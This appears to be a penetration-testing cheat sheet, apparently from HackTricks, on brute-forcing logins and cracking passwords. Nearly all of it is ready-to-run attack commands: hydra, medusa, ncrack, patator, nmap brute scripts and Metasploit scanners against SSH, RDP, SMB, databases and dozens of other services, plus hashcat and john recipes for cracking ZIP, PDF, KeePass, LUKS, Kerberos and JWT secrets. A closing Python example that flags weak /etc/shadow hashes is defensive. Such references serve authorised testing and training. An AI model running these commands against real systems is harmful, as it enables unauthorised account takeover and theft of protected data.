Default Credentials
Search Google for default credentials of the technology in use, or try these links:
Create your own Dictionaries
Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
Crunch
crunch 4 6 0123456789ABCDEF -o crunch1.txt   # lengths 4 to 6 from the given charset, written to crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha   # length 4 only, using the mixalpha charset from charset.lst
# Pattern placeholders for -t:
# @ Lower case alpha characters
# , Upper case alpha characters
# % Numeric characters
# ^ Special characters including space
crunch 6 8 -t ,@@^^%%
Cewl
cewl example.com -m 5 -w words.txt   # spider example.com, keep words of at least 5 characters
Generate passwords based on your knowledge of the victim (names, dates...)
Wordlists
Services
Ordered alphabetically by service name.
AFP
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run
AJP
nmap --script ajp-brute -p 8009 <IP>
Cassandra
nmap --script cassandra-brute -p 9160 <IP>
CouchDB
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Docker Registry
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Elasticsearch
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
FTP
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
HTTP Generic Brute
HTTP Basic Auth
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
HTTP - Post Form
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
For HTTPS, change "http-post-form" to "https-post-form".
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
IMAP
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
IRC
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
ISCSI
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
JWT
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
python3 jwt_tool.py -d wordlists.txt <JWT token>
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
LDAP
nmap --script ldap-brute -p 389 <IP>
Mongo
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
MySQL
hydra -L usernames.txt -P pass.txt <IP> mysql
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
OracleSQL
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
In order to use oracle_login with patator you need to install:
pip3 install cx_Oracle --upgrade
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
POP
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
PostgreSQL
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
PPTP
sudo dpkg -i thc-pptp-bruter*.deb
cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>
RDP
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
Redis
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra -P /path/pass.txt redis://<IP>:<PORT>
Rexec
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
Rlogin
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
Rsh
hydra -L <Username_list> rsh://<Victim_IP> -v -V
Rsync
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
RTSP
hydra -l root -P passwords.txt <IP> rtsp
SNMP
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
SMB
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
SMTP
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V
SOCKS
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
SQL Server
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host>
msf> use auxiliary/scanner/mssql/mssql_login
SSH
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
Telnet
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
VNC
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:<PORT>
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script vnc-brute -p 5900 <IP>
Winrm
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Local
Online cracking databases
Check these before trying to brute-force a hash.
ZIP
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
zip2john file.zip > zip.john
john zip.john
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt
7z
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
PDF
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
JWT
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john
NTLM cracking
Keepass
sudo apt-get install -y kpcli   # install the keepass tools, including keepass2john
keepass2john file.kdbx > hash   # database protected by a master password only
keepass2john -k <file-password> file.kdbx > hash   # database that also requires a key file
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Kerberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
LUKS image
Method 1
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/
mount /dev/mapper/mylucksopen /mnt
Method 2
cryptsetup luksDump backup.img   # check the payload offset: the dd count below assumes 4096 sectors
dd if=backup.img of=luckshash bs=512 count=4097   # LUKS header plus the first payload sector
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/
mount /dev/mapper/mylucksopen /mnt
MySQL
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
PGP/GPG Private key
gpg2john private_pgp.key > hash   # extract the crackable hash into a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Hash-identifier
John mutation
Read /etc/john/john.conf and configure it
john --wordlist=words.txt --rules --stdout > w_mutated.txt   # apply the default rule set
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt   # apply every rule set in john.conf
Hashcat
hashcat --example-hashes | grep -B1 -A2 "NTLM"   # show the mode number and example hash for NTLM
Cracking Linux Hashes - /etc/shadow file
Mode | Name                          | Category
500  | md5crypt $1$, MD5(Unix)       | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)   | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
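Added here as an example that is not part of the HackTricks page: a small Python audit that maps the password field of /etc/shadow entries to the hashcat modes in the table above, so an administrator can see which accounts are still protected by fast-to-crack md5crypt. The shadow lines are constructed, and treating only md5crypt as weak is this example's own choice.

```python
# Added example, not from the HackTricks page: classify /etc/shadow entries by their
# modular-crypt prefix and map them to the hashcat modes in the table above.

# Prefix -> (hashcat mode, algorithm name), matching the table on this page.
SHADOW_MODES = {
    "$1$": (500, "md5crypt"),
    "$5$": (7400, "sha256crypt"),
    "$6$": (1800, "sha512crypt"),
    # bcrypt has several prefix variants; hashcat lists them together as $2*$.
    "$2a$": (3200, "bcrypt"), "$2b$": (3200, "bcrypt"), "$2y$": (3200, "bcrypt"),
}

# Algorithms an auditor should flag: md5crypt is cheap to brute-force on GPUs.
WEAK = {"md5crypt"}


def classify_hash(field):
    """Return (hashcat_mode, algorithm) for a shadow password field, or
    (None, reason) when the field is locked, empty or of unknown format."""
    if field in ("", "*") or field.startswith("!"):
        return None, "locked-or-empty"  # nothing crackable in this field
    for prefix, (mode, name) in SHADOW_MODES.items():
        if field.startswith(prefix):
            return mode, name
    return None, "unknown"


def audit_shadow(lines):
    """Parse shadow-format lines; return one dict per account with its
    algorithm, hashcat mode and whether the hash counts as weak."""
    report = []
    for line in lines:
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0] or fields[0].startswith("#"):
            continue  # blank, comment or malformed line
        mode, algo = classify_hash(fields[1])
        report.append({"user": fields[0], "mode": mode, "algo": algo,
                       "weak": algo in WEAK})
    return report


# Constructed sample lines; the hash bodies are placeholders, not real hashes.
SAMPLE_SHADOW = [
    "root:$6$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::",
    "legacy:$1$abcdefgh$PLACEHOLDERHASH:18000:0:99999:7:::",
    "svc:$2y$10$PLACEHOLDERHASH:18500:0:99999:7:::",
    "daemon:*:18000:0:99999:7:::",
    "guest:!!:18000:0:99999:7:::",
]
```

Running `audit_shadow` on the real file (as root) and filtering on `weak` gives the list of accounts whose password should be rehashed under sha512crypt or bcrypt.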
Cracking Windows Hashes
Mode | Name | Category
3000 | LM   | Operating-Systems
1000 | NTLM | Operating-Systems
Cracking Common Application Hashes
Mode  | Name     | Category
900   | MD4      | Raw Hash
0     | MD5      | Raw Hash
5100  | Half MD5 | Raw Hash
100   | SHA1     | Raw Hash
10800 | SHA-384  | Raw Hash
1400  | SHA-256  | Raw Hash
1700  | SHA-512  | Raw Hash